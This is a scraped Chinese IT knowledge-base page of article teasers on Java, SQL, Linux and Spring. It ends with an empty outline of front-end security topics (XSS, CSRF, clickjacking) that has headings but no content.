,又怎么可以说你学好了这门语言呢？如果标配的技能都没有撑握好，怎么可以任性的玩耍呢？怎么验证自己学好了以上三个基本点呢，我找到一段不错的代码，稍加改动，如果能够读懂它，那么你就可以任性了。 function jClass(b</div> </li> <li><a href="/article/259.htm" title="Java常用工具包 Jodd" target="_blank">Java常用工具包 Jodd</a> <span class="text-muted">Kai_Ge</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jodd/1.htm">jodd</a> <div>Jodd 是一个开源的 Java 工具集，包含一些实用的工具类和小型框架。简单，却很强大！写道 Jodd = Tools + IoC + MVC + DB + AOP + TX + JSON + HTML < 1.5 Mb Jodd 被分成众多模块，按需选择，其中工具类模块有： jodd-core    &nb</div> </li> <li><a href="/article/386.htm" title="SpringMvc下载" target="_blank">SpringMvc下载</a> <span class="text-muted">120153216</span> <a class="tag" taget="_blank" href="/search/springMVC/1.htm">springMVC</a> <div>@RequestMapping(value = WebUrlConstant.DOWNLOAD) public void download(HttpServletRequest request,HttpServletResponse response,String fileName) { OutputStream os = null; InputStream is = null; </div> </li> <li><a href="/article/513.htm" title="Python 标准异常总结" target="_blank">Python 标准异常总结</a> <span class="text-muted">2002wmj</span> <a class="tag" taget="_blank" href="/search/python/1.htm">python</a> <div>Python标准异常总结 AssertionError 断言语句（assert）失败 AttributeError 尝试访问未知的对象属性 EOFError 用户输入文件末尾标志EOF（Ctrl+d） FloatingPointError 浮点计算错误 GeneratorExit generator.close()方法被调用的时候 ImportError 导入模块失</div> </li> <li><a href="/article/640.htm" title="SQL函数返回临时表结构的数据用于查询" target="_blank">SQL函数返回临时表结构的数据用于查询</a> <span class="text-muted">357029540</span> <a class="tag" taget="_blank" href="/search/SQL+Server/1.htm">SQL Server</a> <div>这两天在做一个查询的SQL，这个SQL的一个条件是通过游标实现另外两张表查询出一个多条数据，这些数据都是INT类型，然后用IN条件进行查询，并且查询这两张表需要通过外部传入参数才能查询出所需数据，于是想到了用SQL函数返回值，并且也这样做了，由于是返回多条数据，所以把查询出来的INT类型值都拼接为了字符串，这时就遇到问题了，在查询SQL中因为条件是INT值，SQL函数的CAST和CONVERST都</div> </li> <li><a href="/article/767.htm" title="java 时间格式化 | 比较大小| 时区个人笔记" target="_blank">java 时间格式化 | 比较大小| 时区个人笔记</a> <span class="text-muted">7454103</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a><a class="tag" taget="_blank" href="/search/tomcat/1.htm">tomcat</a><a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/MyEclipse/1.htm">MyEclipse</a> <div>个人总结！不当之处多多包含！引用 1.0 如何设置 tomcat 的时区：          位置：(catalina.bat---JAVA_OPTS  下面加上)          set JAVA_OPT</div> </li> <li><a href="/article/894.htm" title="时间获取Clander的用法" target="_blank">时间获取Clander的用法</a> <span class="text-muted">adminjun</span> <a class="tag" taget="_blank" href="/search/Clander/1.htm">Clander</a><a class="tag" taget="_blank" href="/search/%E6%97%B6%E9%97%B4/1.htm">时间</a> <div>/**    * 得到几天前的时间    * @param d    * @param day    * @return    */   public static Date getDateBefore(Date d,int day){    Calend</div> </li> <li><a href="/article/1021.htm" title="JVM初探与设置" target="_blank">JVM初探与设置</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>JVM是Java Virtual Machine（Java虚拟机）的缩写，JVM是一种用于计算设备的规范，它是一个虚构出来的计算机，是通过在实际的计算机上仿真模拟各种计算机功能来实现的。Java虚拟机包括一套字节码指令集、一组寄存器、一个栈、一个垃圾回收堆和一个存储方法域。 JVM屏蔽了与具体操作系统平台相关的信息，使Java程序只需生成在Java虚拟机上运行的目标代码（字节码）,就可以在多种平台</div> </li> <li><a href="/article/1148.htm" title="SQL中ON和WHERE的区别" target="_blank">SQL中ON和WHERE的区别</a> <span class="text-muted">avords</span> <div>SQL中ON和WHERE的区别   数据库在通过连接两张或多张表来返回记录时，都会生成一张中间的临时表，然后再将这张临时表返回给用户。   www.2cto.com   在使用left jion时，on和where条件的区别如下：  1、 on条件是在生成临时表时使用的条件，它不管on中的条件是否为真，都会返回左边表中的记录。  </div> </li> <li><a href="/article/1275.htm" title="说说自信" target="_blank">说说自信</a> <span class="text-muted">houxinyou</span> <a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E7%94%9F%E6%B4%BB/1.htm">生活</a> <div>自信的来源分为两种,一种是源于实力,一种源于头脑.实力是一个综合的评定,有自身的能力,能利用的资源等.比如我想去月亮上,要身体素质过硬,还要有飞船等等一系列的东西.这些都属于实力的一部分.而头脑不同,只要你头脑够简单就可以了!同样要上月亮上,你想,我一跳,1米,我多跳几下,跳个几年,应该就到了!什么?你说我会往下掉?你笨呀你!找个东西踩一下不就行了吗?     无论工作还</div> </li> <li><a href="/article/1402.htm" title="WEBLOGIC事务超时设置" target="_blank">WEBLOGIC事务超时设置</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/weblogic/1.htm">weblogic</a><a class="tag" taget="_blank" href="/search/jta/1.htm">jta</a><a class="tag" taget="_blank" href="/search/%E4%BA%8B%E5%8A%A1%E8%B6%85%E6%97%B6/1.htm">事务超时</a> <div>        系统中统计数据，由于调用统计过程，执行时间超过了weblogic设置的时间，提示如下错误：统计数据出错! 原因：The transaction is no longer active - status: 'Rolling Back. [Reason=weblogic.transaction.internal</div> </li> <li><a href="/article/1529.htm" title="两年已过去，再看该如何快速融入新团队" target="_blank">两年已过去，再看该如何快速融入新团队</a> <span class="text-muted">bingyingao</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E4%BA%92%E8%81%94%E7%BD%91/1.htm">互联网</a><a class="tag" taget="_blank" href="/search/%E8%9E%8D%E5%85%A5/1.htm">融入</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E6%96%B0%E5%9B%A2%E9%98%9F/1.htm">新团队</a> <div>偶得的空闲，翻到了两年前的帖子该如何快速融入一个新团队，有所感触，就记下来，为下一个两年后的今天做参考。     时隔两年半之后的今天，再来看当初的这个博客，别有一番滋味。而我已经于今年三月份离开了当初所在的团队，加入另外的一个项目组，2011年的这篇博客之后的时光，我很好的融入了那个团队，而直到现在和同事们关系都特别好。大家在短短一年半的时间离一起经历了一</div> </li> <li><a href="/article/1656.htm" title="【Spark七十七】Spark分析Nginx和Apache的access.log" target="_blank">【Spark七十七】Spark分析Nginx和Apache的access.log</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a> <div>Spark分析Nginx和Apache的access.log，第一个问题是要对Nginx和Apache的access.log文件进行按行解析，按行解析就的方法是正则表达式：   Nginx的access.log解析正则表达式   val PATTERN = """([^ ]*) ([^ ]*) ([^ ]*) (\\[.*\\]) (\&q</div> </li> <li><a href="/article/1783.htm" title="Erlang patch" target="_blank">Erlang patch</a> <span class="text-muted">bookjovi</span> <a class="tag" taget="_blank" href="/search/erlang/1.htm">erlang</a> <div>Totally five patchs committed to erlang otp, just small patchs. IMO, erlang really is a interesting programming language, I really like its concurrency feature. but the functional programming style </div> </li> <li><a href="/article/1910.htm" title="log4j日志路径中加入日期" target="_blank">log4j日志路径中加入日期</a> <span class="text-muted">bro_feng</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/log4j/1.htm">log4j</a> <div>要用log4j使用记录日志，日志路径有每日的日期，文件大小5M新增文件。实现方式 log4j: <appender name="serviceLog" class="org.apache.log4j.RollingFileAppender"> <param name="Encoding" v</div> </li> <li><a href="/article/2037.htm" title="读《研磨设计模式》-代码笔记-桥接模式" target="_blank">读《研磨设计模式》-代码笔记-桥接模式</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a> <div>声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ /** * 个人觉得关于桥接模式的例子，蜡笔和毛笔这个例子是最贴切的：http://www.cnblogs.com/zhenyulu/articles/67016.html * 笔和颜色是可分离的，蜡笔把两者耦合在一起了：一支蜡笔只有一种</div> </li> <li><a href="/article/2164.htm" title="windows7下SVN和Eclipse插件安装" target="_blank">windows7下SVN和Eclipse插件安装</a> <span class="text-muted">chenyu19891124</span> <a class="tag" taget="_blank" href="/search/eclipse%E6%8F%92%E4%BB%B6/1.htm">eclipse插件</a> <div>今天花了一天时间弄SVN和Eclipse插件的安装，今天弄好了。svn插件和Eclipse整合有两种方式，一种是直接下载插件包，二种是通过Eclipse在线更新。由于之前Eclipse版本和svn插件版本有差别，始终是没装上。最后在网上找到了适合的版本。所用的环境系统：windows7JDK：1.7svn插件包版本：1.8.16Eclipse：3.7.2工具下载地址：Eclipse下在地址：htt</div> </li> <li><a href="/article/2291.htm" title="[转帖]工作流引擎设计思路" target="_blank">[转帖]工作流引擎设计思路</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">应用服务器</a><a class="tag" taget="_blank" href="/search/workflow/1.htm">workflow</a><a class="tag" taget="_blank" href="/search/%E4%BC%81%E4%B8%9A%E5%BA%94%E7%94%A8/1.htm">企业应用</a> <div> 作为国内的同行，我非常希望在流程设计方面和大家交流，刚发现篇好文(那么好的文章，现在才发现，可惜)，关于流程设计的一些原理，个人觉得本文站得高，看得远，比俺的文章有深度，转载如下 ================================================================================= 自开博以来不断有朋友来探讨工作流引擎该如何</div> </li> <li><a href="/article/2418.htm" title="Linux 查看内存，CPU及硬盘大小的方法" target="_blank">Linux 查看内存，CPU及硬盘大小的方法</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/cpu/1.htm">cpu</a><a class="tag" taget="_blank" href="/search/%E5%86%85%E5%AD%98/1.htm">内存</a><a class="tag" taget="_blank" href="/search/%E7%A1%AC%E7%9B%98/1.htm">硬盘</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E5%B0%8F/1.htm">大小</a> <div>一、查看CPU信息的命令 [root@R4 ~]# cat /proc/cpuinfo |grep "model name" && cat /proc/cpuinfo |grep "physical id" model name : Intel(R) Xeon(R) CPU X5450 @ 3.00GHz model name : </div> </li> <li><a href="/article/2545.htm" title="linux 踢出在线用户" target="_blank">linux 踢出在线用户</a> <span class="text-muted">dongwei_6688</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>两个步骤： 1.用w命令找到要踢出的用户，比如下面：   [root@localhost ~]# w 18:16:55 up 39 days, 8:27, 3 users, load average: 0.03, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT</div> </li> <li><a href="/article/2672.htm" title="放手吧,就像不曾拥有过一样" target="_blank">放手吧,就像不曾拥有过一样</a> <span class="text-muted">dcj3sjt126com</span> <div>内容提要：静悠悠编著的《放手吧就像不曾拥有过一样》集结“全球华语世界最舒缓心灵”的精华故事，触碰生命最深层次的感动，献给全世界亿万读者。《放手吧就像不曾拥有过一样》的作者衷心地祝愿每一位读者都给自己一个重新出发的理由，将那些令你痛苦的、扛起的、背负的，一并都放下吧！把憔悴的面容换做一种清淡的微笑，把沉重的步伐调节成春天五线谱上的音符，让自己踏着轻快的节奏，在人生的海面上悠然漂荡，享受宁静与</div> </li> <li><a href="/article/2799.htm" title="php二进制安全的含义" target="_blank">php二进制安全的含义</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a> <div>PHP里，有string的概念。 string里，每个字符的大小为byte（与PHP相比，Java的每个字符为Character，是UTF8字符，C语言的每个字符可以在编译时选择）。 byte里，有ASCII代码的字符，例如ABC，123，abc，也有一些特殊字符，例如回车，退格之类的。特殊字符很多是不能显示的。或者说，他们的显示方式没有标准，例如编码65到哪儿都是字母A，编码97到哪儿都是字符</div> </li> <li><a href="/article/2926.htm" title="Linux下禁用T440s，X240的一体化触摸板(touchpad)" target="_blank">Linux下禁用T440s，X240的一体化触摸板(touchpad)</a> <span class="text-muted">gashero</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/ThinkPad/1.htm">ThinkPad</a><a class="tag" taget="_blank" href="/search/%E8%A7%A6%E6%91%B8%E6%9D%BF/1.htm">触摸板</a> <div>自打1月买了Thinkpad T440s就一直很火大，其中最让人恼火的莫过于触摸板。   Thinkpad的经典就包括用了小红点(TrackPoint)。但是小红点只能定位，还是需要鼠标的左右键的。但是自打T440s等开始启用了一体化触摸板，不再有实体的按键了。问题是要是好用也行。   实际使用中，触摸板一堆问题，比如定位有抖动，以及按键时会有飘逸。这就导致了单击经常就</div> </li> <li><a href="/article/3053.htm" title="graph_dfs" target="_blank">graph_dfs</a> <span class="text-muted">hcx2013</span> <a class="tag" taget="_blank" href="/search/Graph/1.htm">Graph</a> <div>package edu.xidian.graph; class MyStack { private final int SIZE = 20; private int[] st; private int top; public MyStack() { st = new int[SIZE]; top = -1; } public void push(i</div> </li> <li><a href="/article/3180.htm" title="Spring4.1新特性——Spring核心部分及其他" target="_blank">Spring4.1新特性——Spring核心部分及其他</a> <span class="text-muted">jinnianshilongnian</span> <a class="tag" taget="_blank" href="/search/spring+4.1/1.htm">spring 4.1</a> <div>目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T</div> </li> <li><a href="/article/3307.htm" title="配置HiveServer2的安全策略之自定义用户名密码验证" target="_blank">配置HiveServer2的安全策略之自定义用户名密码验证</a> <span class="text-muted">liyonghui160com</span> <div>    具体从网上看   http://doc.mapr.com/display/MapR/Using+HiveServer2#UsingHiveServer2-ConfiguringCustomAuthentication   LDAP Authentication using OpenLDAP Setting </div> </li> <li><a href="/article/3434.htm" title="一位30多的程序员生涯经验总结" target="_blank">一位30多的程序员生涯经验总结</a> <span class="text-muted">pda158</span> <a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E7%94%9F%E6%B4%BB/1.htm">生活</a><a class="tag" taget="_blank" href="/search/%E5%92%A8%E8%AF%A2/1.htm">咨询</a> <div>1.客户在接触到产品之后，才会真正明白自己的需求。　　这是我在我的第一份工作上面学来的。只有当我们给客户展示产品的时候，他们才会意识到哪些是必须的。给出一个功能性原型设计远远比一张长长的文字表格要好。 2.只要有充足的时间，所有安全防御系统都将失败。　　安全防御现如今是全世界都在关注的大课题、大挑战。我们必须时时刻刻积极完善它，因为黑客只要有一次成功，就可以彻底打败你。   3.</div> </li> <li><a href="/article/3561.htm" title="分布式web服务架构的演变" target="_blank">分布式web服务架构的演变</a> <span class="text-muted">自由的奴隶</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">应用服务器</a><a class="tag" taget="_blank" href="/search/%E4%BA%92%E8%81%94%E7%BD%91/1.htm">互联网</a> <div>最开始，由于某些想法，于是在互联网上搭建了一个网站，这个时候甚至有可能主机都是租借的，但由于这篇文章我们只关注架构的演变历程，因此就假设这个时候已经是托管了一台主机，并且有一定的带宽了，这个时候由于网站具备了一定的特色，吸引了部分人访问，逐渐你发现系统的压力越来越高，响应速度越来越慢，而这个时候比较明显的是数据库和应用互相影响，应用出问题了，数据库也很容易出现问题，而数据库出问题的时候，应用也容易</div> </li> <li><a href="/article/3688.htm" title="初探Druid连接池之二——慢SQL日志记录" target="_blank">初探Druid连接池之二——慢SQL日志记录</a> <span class="text-muted">xingsan_zhang</span> <a class="tag" taget="_blank" href="/search/%E6%97%A5%E5%BF%97/1.htm">日志</a><a class="tag" taget="_blank" href="/search/%E8%BF%9E%E6%8E%A5%E6%B1%A0/1.htm">连接池</a><a class="tag" taget="_blank" href="/search/druid/1.htm">druid</a><a class="tag" taget="_blank" href="/search/%E6%85%A2SQL/1.htm">慢SQL</a> <div>由于工作原因，这里先不说连接数据库部分的配置，后面会补上，直接进入慢SQL日志记录。   1.applicationContext.xml中增加如下配置： <bean abstract="true" id="mysql_database" class="com.alibaba.druid.pool.DruidDataSourc</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类：</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.  </div> </div> </footer>  <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>

前端安全问题小结

. 前沿

第一个 xss攻击

造成的影响：

如何防范

第二个 csrf攻击

造成的影响：

如何防范

第三个 点击劫持

如何防范

第三个点击劫持